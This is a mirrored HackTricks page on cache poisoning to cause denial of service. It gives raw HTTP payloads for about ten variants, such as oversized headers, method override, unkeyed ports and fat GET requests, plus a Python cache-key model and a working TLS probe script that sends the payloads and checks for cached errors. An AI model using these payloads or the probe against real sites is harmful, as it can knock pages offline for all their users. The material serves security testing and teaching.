mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
# Cache Poisoning to DoS

{{#include ../../banners/hacktricks-training.md}}

> [!CAUTION]
> This page collects variants that try to make the **web server return an error response to a request that the cache server treats as valid**, so that the error is stored and served to every later visitor of that cache key. Each variant needs two things: an input the cache does not key on (or normalises away), and a cache that is willing to store the resulting error response.
- **HTTP Header Oversize (HHO)**

Send a request whose headers are larger than what the web server accepts but smaller than what the cache server accepts. The web server answers with a 400, and that response may be cached. Ramp the header size up in steps: a 400 that only appears above a certain size, followed by a cache hit on a clean request for the same key, is the signature:

```
GET / HTTP/1.1
Host: redacted.com
X-Oversize-Header: Big-Value-000000000000000
```

- **HTTP Meta Character (HMC) & Unexpected values**

Send a header that contains harmful meta characters such as `\n` and `\r`. For the attack to work you must first bypass the cache, so that the malformed request actually reaches the origin instead of being answered from a stored copy:

```
GET / HTTP/1.1
Host: redacted.com
X-Meta-Header: Bad Chars\n \r
```

Note that a badly configured header can be as small as `\:` on its own line.

Sending unexpected values, for example an unexpected `Content-Type:`, may also work:

```
GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld
```

- **Unkeyed header**

Some sites return an error status code if they **see certain specific headers** in the request, such as `X-Amz-Website-Location-Redirect: someThing`. When that header is not part of the cache key, the error is stored under the key of the plain request:

```
GET /app.js HTTP/2
Host: redacted.com
X-Amz-Website-Location-Redirect: someThing

HTTP/2 403 Forbidden
Cache: hit

Invalid Header
```

- **HTTP Method Override Attack (HMO)**

If the server supports changing the HTTP method through headers such as `X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`, a valid page can be requested with the method switched to one the endpoint does not support, so that the resulting error response gets cached:

```
GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST
```

- **Unkeyed port**

If the port in the Host header is reflected in the response but is not part of the cache key, a redirect to an unused port can be poisoned into the cache. The first response below is a miss; once it is stored, every later request for `/index.html` is redirected to port 1, where nothing listens:

```
GET /index.html HTTP/1.1
Host: redacted.com:1

HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss
```

- **Long redirect DoS**

In the example below the `x` parameter is not part of the cache key, so an attacker can abuse the redirect behaviour: the 301 whose `Location` carries a very long `x` is stored under the key for `/login`. Anyone who then requests `/login` without that parameter is redirected to the oversized URL, and the follow-up request returns an error:

```
GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 301 Moved Permanently
Location: /login/?x=veryLongUrl
Cache: hit

GET /login/?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss
```

- **Host header case normalization**

The Host header should be treated case-insensitively, but some sites expect it in lowercase and return an error otherwise. If the cache folds the Host to lowercase when building its key, that error is stored under the key every normal user hits:

```
GET /img.png HTTP/1.1
Host: Cdn.redacted.com

HTTP/1.1 404 Not Found
Cache: miss

Not Found
```

- **Path normalization**

Some pages return an error code when data in the path is sent URL-encoded, but the cache server URL-decodes the path and stores the response under the decoded path, so the error is served to users requesting `/api/v1.1/user`:

```
GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com

HTTP/1.1 404 Not Found
Cache: miss

Not Found
```
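The four sections above (unkeyed port, long redirect DoS, Host header case normalization and path normalization) all rely on the same thing: the cache normalises part of the request when it builds its key, while the origin parses the request as sent. The following Python model is an added example, not code from this page or its references; the normalisations in `cache_key` and the `KeyPolicy` knobs are assumptions chosen to mirror the behaviour the examples show, not any vendor's actual implementation.

```python
"""Model of how a cache's key can diverge from what the origin sees.

Added example, not code from the page or the referenced posts. The key function
applies normalisations that caches commonly perform (case-fold the Host, drop its
port, percent-decode the path, ignore unkeyed query parameters); it is an
assumption for illustration, not any vendor's implementation. It shows why the
Host-case, unkeyed-port, path-normalisation and long-redirect variants all land
on the same key as a legitimate user's request.
"""
from typing import Dict, FrozenSet, NamedTuple, Tuple
from urllib.parse import parse_qsl, unquote, urlencode, urlsplit


class Request(NamedTuple):
    target: str   # request-target exactly as sent, e.g. /api/v1%2e1/user?x=1
    host: str     # Host header value exactly as sent, e.g. Cdn.redacted.com:1


class KeyPolicy(NamedTuple):
    unkeyed_params: FrozenSet[str] = frozenset()  # query params the cache ignores
    decode_path: bool = True
    strip_port: bool = True
    fold_host_case: bool = True


CacheKey = Tuple[str, str, str]  # (host, path, keyed query string)


def cache_key(req: Request, policy: KeyPolicy) -> CacheKey:
    """What the cache indexes the response under (assumed normalisations)."""
    host = req.host.split(":", 1)[0] if policy.strip_port else req.host
    if policy.fold_host_case:
        host = host.lower()
    parts = urlsplit(req.target)
    path = unquote(parts.path) if policy.decode_path else parts.path
    kept = sorted((k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
                  if k not in policy.unkeyed_params)
    return host, path, urlencode(kept)


def origin_view(req: Request) -> CacheKey:
    """What the origin actually parses: no normalisation at all."""
    parts = urlsplit(req.target)
    return req.host, parts.path, parts.query


def collides(poison: Request, victim: Request, policy: KeyPolicy) -> bool:
    """True when the cache would hand the poison response to the victim even though
    the origin treats the two requests differently (the precondition for the DoS)."""
    return (cache_key(poison, policy) == cache_key(victim, policy)
            and origin_view(poison) != origin_view(victim))


# The page's four cases, each paired with the request a normal user would send.
PAGE_CASES: Dict[str, Tuple[Request, Request]] = {
    "host case":     (Request("/img.png", "Cdn.redacted.com"), Request("/img.png", "cdn.redacted.com")),
    "unkeyed port":  (Request("/index.html", "redacted.com:1"), Request("/index.html", "redacted.com")),
    "path encoding": (Request("/api/v1%2e1/user", "redacted.com"), Request("/api/v1.1/user", "redacted.com")),
    "unkeyed x":     (Request("/login?x=" + "A" * 9000, "www.cloudflare.com"), Request("/login", "www.cloudflare.com")),
}


def page_examples(policy: KeyPolicy = KeyPolicy(unkeyed_params=frozenset({"x"}))) -> Dict[str, bool]:
    """Which of the page's cases collide under the given key policy."""
    return {name: collides(p, v, policy) for name, (p, v) in PAGE_CASES.items()}


if __name__ == "__main__":
    for name, hit in page_examples().items():
        print(f"{name:14} collides={hit}")
    # Tightening the policy removes the collision: a cache that keys on the raw
    # (undecoded) path no longer merges /api/v1%2e1/user with /api/v1.1/user.
    print(page_examples(KeyPolicy(decode_path=False))["path encoding"])
```

The point of `collides` is the asymmetry: a collision is only dangerous when the cache key is shared while the origin's view differs. Flipping a single `KeyPolicy` field is the quickest way to see which normalisation a given cache would have to drop (or which input it would have to add to the key) to close the variant.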

- **Fat GET**

Some cache servers, such as Cloudflare, or web servers reject GET requests that carry a body, so this can be abused to get an invalid response cached:

```
GET /index.html HTTP/2
Host: redacted.com
Content-Length: 3

xyz

HTTP/2 403 Forbidden
Cache: hit
```
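Turning any of the header- and body-based variants above (HHO, HMC and unexpected Content-Type, unkeyed header, HMO, Fat GET) into a confirmed finding takes the same two-step check every time: send the payload under a fresh cache key, then re-request that key cleanly and see whether the error comes back as a cache hit. The following Python helper is an added example, not code from this page or its references; the header names it sends, the 12000-byte HHO size, the `cb` cache-buster parameter and the two sample exchanges are assumptions and constructed data.

```python
"""Probe-and-verify loop for the header- and body-based variants on this page.

Added example, not code from the page or the referenced posts. It builds raw
requests for the HHO, HMC, unexpected Content-Type, unkeyed-header, HMO and
Fat GET variants, sends each under a fresh cache-buster, then re-requests the
same key WITHOUT the payload: only when that clean request gets the error back
as a cache hit is the variant a usable DoS primitive. Header names, the HHO
size and the sample responses are assumptions / constructed data.
"""
import re
import socket
import ssl
import uuid
from typing import Callable, Dict, Iterable, Optional, Tuple

Sender = Callable[[bytes], bytes]  # raw request bytes -> raw response bytes

# Payloads follow the page's examples; tune the HHO size to the target's limits.
VARIANTS: Dict[str, Tuple[Dict[str, str], bytes]] = {
    "HHO":          ({"X-Oversize-Header": "A" * 12000}, b""),
    "HMC":          ({"X-Meta-Header": "Bad Chars\n \r"}, b""),
    "Content-Type": ({"Content-Type": "HelloWorld"}, b""),
    "Unkeyed hdr":  ({"X-Amz-Website-Location-Redirect": "someThing"}, b""),
    "HMO":          ({"X-HTTP-Method-Override": "POST"}, b""),
    "Fat GET":      ({}, b"xyz"),
}


def build_request(host: str, path: str, buster: str,
                  headers: Optional[Dict[str, str]] = None, body: bytes = b"") -> bytes:
    """Raw HTTP/1.1 GET; the cb= query keeps each probe on an unused cache key."""
    sep = "&" if "?" in path else "?"
    lines = [f"GET {path}{sep}cb={buster} HTTP/1.1", f"Host: {host}", "Connection: close"]
    lines += [f"{name}: {value}" for name, value in (headers or {}).items()]
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


_STATUS = re.compile(rb"^HTTP/\d(?:\.\d)?\s+(\d{3})")


def parse_response(raw: bytes) -> Tuple[int, str]:
    """Return (status code, cache verdict) with verdict 'hit', 'miss' or 'unknown'."""
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.splitlines()
    match = _STATUS.match(lines[0]) if lines else None
    status = int(match.group(1)) if match else 0
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    # Vendor cache-status headers first, then a positive Age as a fallback hit marker.
    for name in ("cf-cache-status", "x-cache-status", "x-cache", "cache"):
        if name in headers:
            return status, "hit" if "hit" in headers[name].lower() else "miss"
    age = headers.get("age", "")
    if age.isdigit():
        return status, "hit" if int(age) > 0 else "miss"
    return status, "unknown"


def classify(poison: Tuple[int, str], clean: Tuple[int, str]) -> str:
    """Verdict for one variant from the poisoning response and the clean re-request."""
    if poison[0] < 400:
        return "no error triggered"
    if clean[0] >= 400 and clean[1] == "hit":
        return "POISONED: error served from cache"
    if clean[0] >= 400:
        return "error repeated without a hit marker (check cache headers by hand)"
    return "error not cached"


def probe(host: str, path: str, send: Sender, variants: Iterable[str] = VARIANTS) -> Dict[str, str]:
    """Run each variant on its own fresh key and report whether the error stuck."""
    results: Dict[str, str] = {}
    for name in variants:
        headers, body = VARIANTS[name]
        buster = uuid.uuid4().hex[:8]
        poisoned = parse_response(send(build_request(host, path, buster, headers, body)))
        clean = parse_response(send(build_request(host, path, buster)))
        results[name] = classify(poisoned, clean)
    return results


def tls_sender(host: str, port: int = 443, timeout: float = 5.0) -> Sender:
    """Plain TLS socket sender so malformed headers leave byte-for-byte as built."""
    ctx = ssl.create_default_context()

    def send(raw: bytes) -> bytes:
        buf = bytearray()
        with socket.create_connection((host, port), timeout=timeout) as sock, \
                ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(raw)
            while data := tls.recv(65536):
                buf += data
        return bytes(buf)
    return send


def replay_sender(responses: Iterable[bytes]) -> Sender:
    """Offline stand-in for tls_sender: hands back constructed responses in order."""
    queue = iter(responses)
    return lambda raw: next(queue)


# Constructed exchanges: first the origin 400s and the clean re-request gets that 400
# back as a hit (a real DoS); second the origin 400s but the cache does not store it.
SAMPLE_POISONED = [b"HTTP/1.1 400 Bad Request\r\nCache: miss\r\nContent-Length: 0\r\n\r\n",
                   b"HTTP/1.1 400 Bad Request\r\nCache: hit\r\nContent-Length: 0\r\n\r\n"]
SAMPLE_NOT_CACHED = [b"HTTP/1.1 400 Bad Request\r\nCF-Cache-Status: BYPASS\r\n\r\n",
                     b"HTTP/1.1 200 OK\r\nCF-Cache-Status: HIT\r\n\r\n"]


def demo() -> Dict[str, str]:
    """Runs the HHO variant against both constructed exchanges."""
    return {"poisoned": probe("redacted.com", "/", replay_sender(SAMPLE_POISONED), ["HHO"])["HHO"],
            "not cached": probe("redacted.com", "/", replay_sender(SAMPLE_NOT_CACHED), ["HHO"])["HHO"]}


if __name__ == "__main__":
    print(demo())
    # Live use, only against targets you are authorised to test:
    # print(probe("redacted.com", "/", tls_sender("redacted.com")))
```

The clean re-request is the part people skip: an origin that answers 400 to a malformed header is not a vulnerability on its own, it only becomes one when the cache keeps that answer. `parse_response` only knows the cache-status headers listed in it; for a CDN that uses a different one, add it to that tuple before trusting an "error not cached" verdict.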

## References

- [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
- [https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------)

{{#include ../../banners/hacktricks-training.md}}